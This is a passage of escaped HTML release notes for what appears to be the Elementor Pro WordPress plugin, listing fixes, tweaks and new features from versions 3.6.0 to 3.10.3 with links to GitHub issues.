Posts and Loop Grid widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20670\\\">#20670<\\/a>)<\\/li>\\n<li>Fix: Invalid attributes names in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17400\\\">#17400<\\/a>)<\\/li>\\n<li>Fix: Post Image Attachments dynamic tag is not working as expected in various widgets<\\/li>\\n<li>Fix: Form fields order is not presented correctly when exported to CSV in Form Submissions<\\/li>\\n<li>Fix: Dynamic background image and video are not working with ACF in Loop Grid widget<\\/li>\\n<\\/ul>\\n<h4>3.10.3 - 2023-01-29<\\/h4>\\n<ul>\\n<li>Tweak: Added introduction video to loop item information modal in Theme Builder<\\/li>\\n<li>Fix: PHP 8.x throws errors and notices in some cases (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21087\\\">#21087<\\/a>)<\\/li>\\n<li>Fix: Infinite Scroll and Load on click pagination are not working as expected in Archive template<\\/li>\\n<li>Fix: Show row even when values do not exist in Form Submissions<\\/li>\\n<\\/ul>\\n<h4>3.10.2 - 2023-01-17<\\/h4>\\n<ul>\\n<li>Fix: Updated compatibility tag for Elementor v3.10<\\/li>\\n<\\/ul>\\n<h4>3.10.1 - 2023-01-09<\\/h4>\\n<p>Fix: Preview Could not be loaded error message appears on pages containing the Loop Grid in a header or footer templates<\\/p>\\n<h4>3.10.0 - 2023-01-09<\\/h4>\\n<ul>\\n<li>New: Added new dynamic tag for due date in Countdown widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7737\\\">#7737<\\/a>)<\\/li>\\n<li>Tweak: Added <code>modified<\\/code> and <code>comment_count<\\/code> to Order By in posts query control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11159\\\">#11159<\\/a>)<\\/li>\\n<li>Tweak: Replaced <code>footer<\\/code> tag in Blockquote and Comments widgets for better semantics<\\/li>\\n<li>Fix: Compatibility issue in Imagify Media Library filters due to <code>_elementor_is_screenshot<\\/code> meta filter (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19988\\\">#19988<\\/a>)<\\/li>\\n<li>Fix: Hotspot Widget label icon height issues when Inline Font Icons experiment is active<\\/li>\\n<li>Fix: Editing glitch when using two loop grid widgets on the same page with the same loop item template<\\/li>\\n<li>Fix: Equal height is not working when using sections in Loop Grid widget<\\/li>\\n<li>Fix: Large amount of menu items are not appearing correctly on a mobile device in Nav Menu widget<\\/li>\\n<li>Fix: Featured Image does not change dynamically when using infinite\\/click pagination in Loop Grid widget<\\/li>\\n<li>Fix: Removed action call of non-existent <code>display_empty_cart_template()<\\/code> method in Cart widget<\\/li>\\n<\\/ul>\\n<h4>3.9.2 - 2022-12-21<\\/h4>\\n<ul>\\n<li>Fix: JS events do not trigger in Popups (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20708\\\">#20708<\\/a>)<\\/li>\\n<li>Fix: PHP Errors appear when not using the toggle menu in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18636\\\">#18636<\\/a>)<\\/li>\\n<li>Fix: Popups\' backgrounds disappear when using Lazy Load Background Images experiment<\\/li>\\n<\\/ul>\\n<h4>3.9.1 - 2022-12-14<\\/h4>\\n<ul>\\n<li>Fix: WooCommerce Product Gallery dynamic tag is not working in Basic Gallery, Gallery and Image Carousel widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20678\\\">#20678<\\/a>)<\\/li>\\n<li>Fix: Hide Empty option is not working in Menu Cart widget<\\/li>\\n<li>Fix: The Stripe Button widget doesn\'t work in Templates<\\/li>\\n<\\/ul>\\n<h4>3.9.0 - 2022-12-06<\\/h4>\\n<ul>\\n<li>New: Added support for WooCommerce to Loop Builder (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20020\\\">#20020<\\/a>)<\\/li>\\n<li>Tweak: Added more options to \'Show up to X times\' advanced rule in Popups (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8187\\\">#8187<\\/a>)<\\/li>\\n<li>Tweak: Allow saving and reloading a page while editing in-place loop item template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19882\\\">#19882<\\/a>)<\\/li>\\n<li>Tweak: Added <code>$location param<\\/code> to <code>elementor\\/theme\\/get_location_templates\\/template_id<\\/code> hook (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18453\\\">#18453<\\/a>)<\\/li>\\n<li>Tweak: Removed redundant labels from group controls (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11666\\\">#11666<\\/a>)<\\/li>\\n<li>Tweak: Added support to use sections and columns as the layout structure of a Loop item template<\\/li>\\n<li>Tweak: Disabled movement when a repeater item is in focus in edit mode<\\/li>\\n<li>Tweak: Upgrade the autoprefixer package to better minify CSS files<\\/li>\\n<li>Tweak: Removed duplicate SQL queries on every page for better performance<\\/li>\\n<li>Tweak: Improved License validation mechanism to avoid limitations<\\/li>\\n<li>Tweak: Added more units options to Border Width control in various elements<\\/li>\\n<li>Tweak: Added <code>em<\\/code> units to Border Radius control in various elements<\\/li>\\n<li>Tweak: Added \'Equal height\' functionality to Loop Grid widget<\\/li>\\n<li>Fix: Issue with Related Products widget and WooCommerce Pixel Manager plugin (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16934\\\">#16934<\\/a>)<\\/li>\\n<li>Fix: My Account widget gets hidden when using a single page template with post content (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19627\\\">#19627<\\/a>)<\\/li>\\n<li>Fix: Cart is not updated when cache enabled in Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19312\\\">#19312<\\/a>)<\\/li>\\n<li>Fix: Entrance animations are not working as expected with Infinite Loop and Load on CLick pagination in Loop Grid widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20293\\\">#20293<\\/a>)<\\/li>\\n<li>Fix: Loading page issues in Form Submissions screen (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19973\\\">#19973<\\/a>)<\\/li>\\n<li>Fix: Recently Edited date and time not working as expected in Elementor Overview plugin in WordPress dashboard (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17966\\\">#17966<\\/a>)<\\/li>\\n<li>Fix: Recurring license mismatch error message when using translators plugins<\\/li>\\n<li>Fix: Submenu items triggers page transition instead of opening in Nav Menu widget<\\/li>\\n<li>Fix: Query values of Posts widget are not imported correctly when importing a Kit<\\/li>\\n<li>Fix: Loop items are exceeding the widget boundaries in Loop Grid widget<\\/li>\\n<li>Fix: Order by option is not working as expected when choosing Upsells, Cross-Sells and Related Products query in Products widget<\\/li>\\n<li>Fix: Various widgets disappear in certain scenarios when choosing direction Row or Column in Container<\\/li>\\n<\\/ul>\\n<h4>3.8.2 - 2022-11-20<\\/h4>\\n<ul>\\n<li>Fix: Z-index issues when applying sticky to Container<\\/li>\\n<li>Fix: Error message appears on front with Editor and Shop Manager roles when using the Loop Builder widget<\\/li>\\n<\\/ul>\\n<h4>3.8.1 - 2022-11-06<\\/h4>\\n<ul>\\n<li>Fix: Sticky inner section is not staying in the column when applying sticky option in Sections (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20203\\\">#20203<\\/a>)<\\/li>\\n<li>Fix: Post Title widget located in a loop item template disappears when enabling the hide title option inside page settings (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20207\\\">#20207<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20255\\\">#20255<\\/a>)<\\/li>\\n<li>Fix: ACF Dynamic data not rendering correctly in various scenarios (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20235\\\">#20235<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20258\\\">#20258<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20277\\\">#20277<\\/a>)<\\/li>\\n<li>Fix: Z-index issues when applying sticky to Container (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20227\\\">#20227<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.8.0 - 2022-10-30<\\/h4>\\n<ul>\\n<li>New: Introducing Loop Builder as a beta status experiment - Create powerful & repeating loop templates and populate each one with dynamic content and design flexibility (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4440\\\">#4440<\\/a>)<\\/li>\\n<li>Tweak: Add <code>wp_body_open()<\\/code> to header in Header template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11562\\\">#11562<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15828\\\">#15828<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13089\\\">#13089<\\/a>)<\\/li>\\n<li>Tweak: Added support border-radius option to the Code Highlight widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14316\\\">#14316<\\/a>)<\\/li>\\n<li>Tweak: Import\\/Export CLI and UI mechanisms were merged into a unified service<\\/li>\\n<li>Tweak: User with no permission to Notes cannot be mentioned in a note<\\/li>\\n<li>Tweak: User with no permission to view a post cannot be mentioned in a note<\\/li>\\n<li>Tweak: Notes was added to the right click context-menu<\\/li>\\n<li>Tweak: Notes panel can be resizable<\\/li>\\n<li>Tweak: Notes panel can be dragged outside of the canvas in responsive mode in the editor<\\/li>\\n<li>Tweak: Updated form validation messages translation strings in Form widget<\\/li>\\n<li>Tweak: Updated translators comments<\\/li>\\n<li>Tweak: Theme Builder logo and Title should be clickable<\\/li>\\n<li>Tweak: Reduced API requests and DB calls on non-write setup<\\/li>\\n<li>Tweak: Added media queries to the Table of Contents widget<\\/li>\\n<li>Fix: Sticky option is not working as expected in various scenarios in Container (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18357\\\">#18357<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19540\\\">#19540<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19618\\\">#19618<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19777\\\">#19777<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19827\\\">#19827<\\/a>)<\\/li>\\n<li>Fix: Mixed Content errors on HTTPS in Video Playlist Widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18895\\\">#18895<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18945\\\">#18945<\\/a>)<\\/li>\\n<li>Fix: Note\'s timestamp is being updated according to the last activity in Notes (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19123\\\">#19123<\\/a>)<\\/li>\\n<li>Fix: Accessibility attribute <code>role=navigation<\\/code> is redundant in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17582\\\">#17582<\\/a>)<\\/li>\\n<li>Fix: Accessibility attribute <code>role=navigation<\\/code> is redundant in pagination in Posts widget<\\/li>\\n<li>Fix: Share buttons is accessible with keyboard but not clickable<\\/li>\\n<li>Fix: Sub-items icons style is missing in preview with Inline Font Icons experiment in Nav Menu widget<\\/li>\\n<li>Fix: Quotes are appearing as HTML when editing a note in Notes<\\/li>\\n<li>Fix: Label\'s Icon height increases when Inline Font Icons experiment is active in Hotspot Widget<\\/li>\\n<li>Fix: Sub conditions of templates are not overridden when importing a Kit<\\/li>\\n<li>Fix: X\\/Y Anchor Point controls were not visible for Scale and Rotate effects<\\/li>\\n<li>Fix: PHP warning notice appears in some situations when using motion effects<\\/li>\\n<\\/ul>\\n<h4>3.7.7 - 2022-09-20<\\/h4>\\n<ul>\\n<li>Fix: Default Flex Grow affects the layout when the container is set to direction Column in various widgets<\\/li>\\n<\\/ul>\\n<h4>3.7.6 - 2022-09-14<\\/h4>\\n<ul>\\n<li>Fix: Submissions menu item appears at the bottom of Elementor section in WordPress dashboard<\\/li>\\n<\\/ul>\\n<h4>3.7.5 - 2022-08-31<\\/h4>\\n<ul>\\n<li>Fix: Error message appears on front if WooCommerce is activated (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19553\\\">#19553<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.7.4 - 2022-08-29<\\/h4>\\n<ul>\\n<li>Tweak: PHP 5.6 Is deprecated<\\/li>\\n<li>Fix: Triangle icon is not being displayed in the Select field when Inline Font Icons Experiment is active in Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18598\\\">#18598<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19495\\\">#19495<\\/a>)<\\/li>\\n<li>Fix: The page jumps or flickers to the video playlist on page reload in Video Playlist Widget<\\/li>\\n<\\/ul>\\n<h4>3.7.3 - 2022-07-31<\\/h4>\\n<ul>\\n<li>Tweak: Improved license mechanism for correct validation<\\/li>\\n<li>Fix: Sticky option causes unexpected results when using the Container (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18357\\\">#18357<\\/a>)<\\/li>\\n<li>Fix: Price list, Portfolio, Flip Box and Gallery widgets disappear when the direction is set to column in Container (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18880\\\">#18880<\\/a>)<\\/li>\\n<li>Fix: Quotes character is showing up as <code>&quot;<\\/code> when editing a note in Notes<\\/li>\\n<\\/ul>\\n<h4>3.7.2 - 2022-06-15<\\/h4>\\n<ul>\\n<li>Tweak: Applied optimized file handling in various modules<\\/li>\\n<li>Fix: Related posts query options are missing in Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18633\\\">#18633<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18641\\\">#18641<\\/a>)<\\/li>\\n<li>Fix: Menu Cart Icon is not being displayed on all browsers when Inline Font Icons Experiment is active (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17705\\\">#17705<\\/a>)<\\/li>\\n<li>Fix: Gallery widget is not working as expected in Container element (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18408\\\">#18408<\\/a>)<\\/li>\\n<li>Fix: Flip box is not visible when the direction is set to Row in Container element (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18413\\\">#18413<\\/a>)<\\/li>\\n<li>Fix: Portfolio widget is not visible when dragged into "Row" direction Container element (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17653\\\">#17653<\\/a>)<\\/li>\\n<li>Fix: Menu cart is open automatically in Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18629\\\">#18629<\\/a>)<\\/li>\\n<li>Fix: PHP error is being shown the license is expired in License screen<\\/li>\\n<\\/ul>\\n<h4>3.7.1 - 2022-05-16<\\/h4>\\n<ul>\\n<li>Fix: Notes icon appears as an empty square in admin top bar for users with permissions lower than Editor<\\/li>\\n<li>Fix: Notes experiment causes a PHP fatal error on some cases<\\/li>\\n<li>Fix: UI glitches in Notes feature<\\/li>\\n<\\/ul>\\n<h4>3.7.0 - 2022-05-10<\\/h4>\\n<ul>\\n<li>New: Introducing Notes - Work collaboratively directly within Elementor<\\/li>\\n<li>New: Stripe Button widget - Collect Stripe payments directly from your site (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14748\\\">#14748<\\/a>)<\\/li>\\n<li>New: Meet WooCommerce Add to Cart dynamic tag - add products to cart from every widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10607\\\">#10607<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11801\\\">#11801<\\/a>)<\\/li>\\n<li>New: Added WooCommerce Product Content dynamic tag (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16367\\\">#16367<\\/a>)<\\/li>\\n<li>Tweak: Added Related, Upsells and Cross-Sells query sources to Products widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8071\\\">#8071<\\/a>)<\\/li>\\n<li>Tweak: Added custom icon control to Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18007\\\">#18007<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14357\\\">#14357<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13151\\\">#13151<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11361\\\">#11361<\\/a>)<\\/li>\\n<li>Tweak: Added an option to minimize on Desktop device in Table of Contents widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9933\\\">#9933<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic tag controls to Share Buttons widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10729\\\">#10729<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic tag controls to Media Carousel widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10314\\\">#10314<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic tag controls to Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6327\\\">#6327<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6691\\\">#6691<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11774\\\">#11774<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9051\\\">#9051<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic tag controls to Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6327\\\">#6327<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic tag controls to Slides widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5760\\\">#5760<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9774\\\">#9774<\\/a>)<\\/li>\\n<li>Tweak: Added align button to bottom option in various Product widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10263\\\">#10263<\\/a>)<\\/li>\\n<li>Tweak: Added align button to bottom control in Posts and Archive Posts widgets<\\/li>\\n<li>Tweak: Added the ability to hide and show the coupon section in WooCommerce Cart widget<\\/li>\\n<li>Tweak: Added the ability to hide and show the coupon section in WooCommerce Checkout widget<\\/li>\\n<li>Tweak: Added alignment option to various buttons in WooCommerce Cart widget<\\/li>\\n<li>Tweak: Added alignment option to various buttons in WooCommerce Checkout widget<\\/li>\\n<li>Tweak: Added percentage unit to padding control in Additional Information customize section in WooCommerce Checkout widget<\\/li>\\n<li>Tweak: Added quick link to create new theme parts directly from the Finder<\\/li>\\n<li>Tweak: Added the option to add a custom template to Dashboard screen in My Account widget<\\/li>\\n<li>Tweak: Added spacing control to view cart button in various product widgets<\\/li>\\n<li>Tweak: Added the option to add a custom template to empty cart state in Cart widget<\\/li>\\n<li>Tweak: Adjusted the layout of the Payment Methods screen in the My Account widget<\\/li>\\n<li>Tweak: Added lazy load option to Media Carousel, Reviews and Testimonial Carousel widgets<\\/li>\\n<li>Tweak: Added Site Identity quick link to Logo widget<\\/li>\\n<li>Tweak: Added Site Identity quick link to Site Title widget<\\/li>\\n<li>Tweak: Created an attribute that allows disabling page transition for specific links<\\/li>\\n<li>Tweak: Added dynamic tag controls to Gallery widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Countdown widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Portfolio widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Price Table widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Login widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Blockquote widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Facebook Comments widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Post Navigation widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Search Form widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Author Box widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Post info widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Archive Posts widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Product Meta widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Archive Products widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Sitemap widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Reviews widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Code Highlight widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to PayPal Button widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to WooCommerce Checkout widget<\\/li>\\n<li>Tweak: Added missing PHP documentation to hooks<\\/li>\\n<li>Fix: Scrolling glitches on mobile devices when Sticky Effect is enabled (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17767\\\">#17767<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18330\\\">#18330<\\/a>)<\\/li>\\n<li>Fix: Only 1st honypot field is validated when using multiple honeypot fields in Forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18136\\\">#18136<\\/a>)<\\/li>\\n<li>Fix: Checkout button background color is not working as expected in Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18289\\\">#18289<\\/a>)<\\/li>\\n<li>Fix: Button labels are not accessible for screen readers in Share buttons widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8615\\\">#8615<\\/a>)<\\/li>\\n<li>Fix: Downloads titles controls are not working in responsive in WooCommerce Purchase Summary widget<\\/li>\\n<li>Fix: Excerpt length is not working as expected in Posts and Archive Posts widgets<\\/li>\\n<li>Fix: Titles & Totals weight is not working in WooCommerce Checkout widget<\\/li>\\n<li>Fix: Product image is not appearing on Single Product Page on template load<\\/li>\\n<li>Fix: Additional Information title not editable in some scenarios in WooCommerce Checkout widget<\\/li>\\n<li>Fix: Cart is not updating automatically on mobile in Cart widget<\\/li>\\n<li>Fix: UI Glitch in Masonry control in Portfolio widget<\\/li>\\n<li>Fix: Custom breakpoints experiment didn\'t work on Single post and page templates<\\/li>\\n<li>Fix: Testimonial carousel & Reviews widgets disregards the <code>alt<\\/code> attribute<\\/li>\\n<li>Fix: Playlist widget deeplink didn\'t send user directly to the widget in the page<\\/li>\\n<li>Fix: Masonry option causes the images to disappear in the Editor in Posts widget<\\/li>\\n<li>Fix: Scrollbar appears after clicking on the dropdown toggle in Nav Menu widget<\\/li>\\n<li>Fix: Custom icons disappear on frontend if the pack name contains numbers<\\/li>\\n<li>Fix: Custom Font disappears if the name contains only numbers<\\/li>\\n<li>Fix: <code>end-section()<\\/code> is missing from Progress Tracker and Facebook Embed widgets<\\/li>\\n<li>Tweak: Added a filter for conditions cache query in Theme Builder<\\/li>\\n<li>Fix: Customizations lost on Ajax refresh in WooCommerce Cart widget<\\/li>\\n<li>Fix: Hello theme Header and Footer experiment is not working when WooCommerce plugin is active<\\/li>\\n<li>Fix: Color controls are not working as expected in Checkout widget<\\/li>\\n<li>Fix: Color controls are not working as expected in My Account widget<\\/li>\\n<li>Fix: Empty state widget preview in the editor is disappearing in various widgets<\\/li>\\n<li>Fix: Cart is not updating automatically on mobile in WooCommerce Cart widget<\\/li>\\n<li>Deprecated: See all deprecations to this version in our <a href=\\\"https:\\/\\/developers.elementor.com\\/v3-7-planned-deprecations\\/\\\">Developers Deprecations Post<\\/a><\\/li>\\n<\\/ul>\\n<h4>3.6.5 - 2022-04-12<\\/h4>\\n<ul>\\n<li>Fix: Compatibility issues for several widgets in iOS 14 and macOS 13 devices (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18090\\\">#18090<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15910\\\">#15910<\\/a>)<\\/li>\\n<li>Fix: Button Alignment doesn\'t work in Custom Add To Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17810\\\">#17810<\\/a>)<\\/li>\\n<li>Fix: PHP warning is thrown in some cases in PayPal button widget<\\/li>\\n<li>Fix: PHP 8.1 throws errors and notices in some cases<\\/li>\\n<li>Fix: PHP notice was thrown when Kit Import process initiated without display conditions<\\/li>\\n<li>Fix: Create Account button always opens on the Sign Up screen even if the user has an account in Onboarding process<\\/li>\\n<\\/ul>\\n<h4>3.6.4 - 2022-03-15<\\/h4>\\n<ul>\\n<li>Tweak: Kit import dynamic reference support for templates and dynamic tags<\\/li>\\n<li>Tweak: Updated tested up to version tag to <code>3.6.0<\\/code><\\/li>\\n<li>Fix: Sticky caused scrolling issues after clicking an element that expands the page height (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17821\\\">#17821<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17839\\\">#17839<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18069\\\">#18069<\\/a>)<\\/li>\\n<li>Fix: When saving Global widget JS error is being thrown and editor fails to load (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17954\\\">#17954<\\/a>)<\\/li>\\n<li>Fix: Motion effects are missing from Background section under Style tab in Container element (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18063\\\">#18063<\\/a>)<\\/li>\\n<li>Fix: Imported Kit doesn\'t appear in the theme builder after successful import in some cases<\\/li>\\n<li>Fix: Added future Pro support to fix the Cart icon that shifted aside in Menu cart widget<\\/li>\\n<\\/ul>\\n<h4>3.6.3 - 2022-02-28<\\/h4>\\n<ul>\\n<li>Fix: Custom Code display conditions modal is not working (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17865\\\">#17865<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17942\\\">#17942<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17994\\\">#17994<\\/a>)<\\/li>\\n<li>Fix: Share buttons are not accessible for keyboard navigation (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8615\\\">#8615<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.6.2 - 2022-02-14<\\/h4>\\n<ul>\\n<li>Fix: Auto updates mechanism is not working as expected (this version might be also installed automatically)<\\/li>\\n<\\/ul>\\n<h4>3.6.1 - 2022-02-09<\\/h4>\\n<ul>\\n<li>Tweak: Allow connecting via generic source for future feature support<\\/li>\\n<li>Fix: Custom Code doesn\'t work when WooCommerce is active (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17675\\\">#17675<\\/a>)<\\/li>\\n<li>Fix: Content animation didn\'t work when Improved asset loading experiment is active Slides widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17055\\\">#17055<\\/a>)<\\/li>\\n<li>Fix: PHP warning appears some times when trying to force-check for available updates<\\/li>\\n<li>Fix: Page transitions are being triggered when not needed<\\/li>\\n<li>Fix: Text alignment on Tablet responsive device affects base device in Testimonial Carousel widget<\\/li>\\n<li>Fix: Harden Submissions feature to prevent potential security issues<\\/li>\\n<li>Fix: Page Transitions Icon option Preloader doesn\'t work on frontend<\\/li>\\n<\\/ul>\\n<h4>3.6.0 - 2022-01-31<\\/h4>\\n<ul>\\n<li>New: WooCommerce Purchase Summary widget - Fully customize the content and style of your order summary page (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5756\\\">#5756<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15862\\\">#15862<\\/a>)<\\/li>\\n<li>New: WooCommerce Notices styling on Site Settings - Customize the appearance of WooCommerce notices (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14570\\\">#14570<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15896\\\">#15896<\\/a>)<\\/li>\\n<li>New: WooCommerce Notices widget - Set the position of WooCommerce notices on your shop pages (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8124\\\">#8124<\\/a>)<\\/li>\\n<li>Experiment: Page Transitions - Customize the page loading experience, and increase brand recognition (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10576\\\">#10576<\\/a>)<\\/li>\\n<li>Tweak: Added WooCommerce & Theme Elements widgets to Improved CSS Loading experiment to save up 126KB per page load (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17412\\\">#17412<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17337\\\">#17337<\\/a>)<\\/li>\\n<li>Tweak: Added new layout options in WooCommerce Add To Cart and WooCommerce Custom Add To Cart widgets (<a 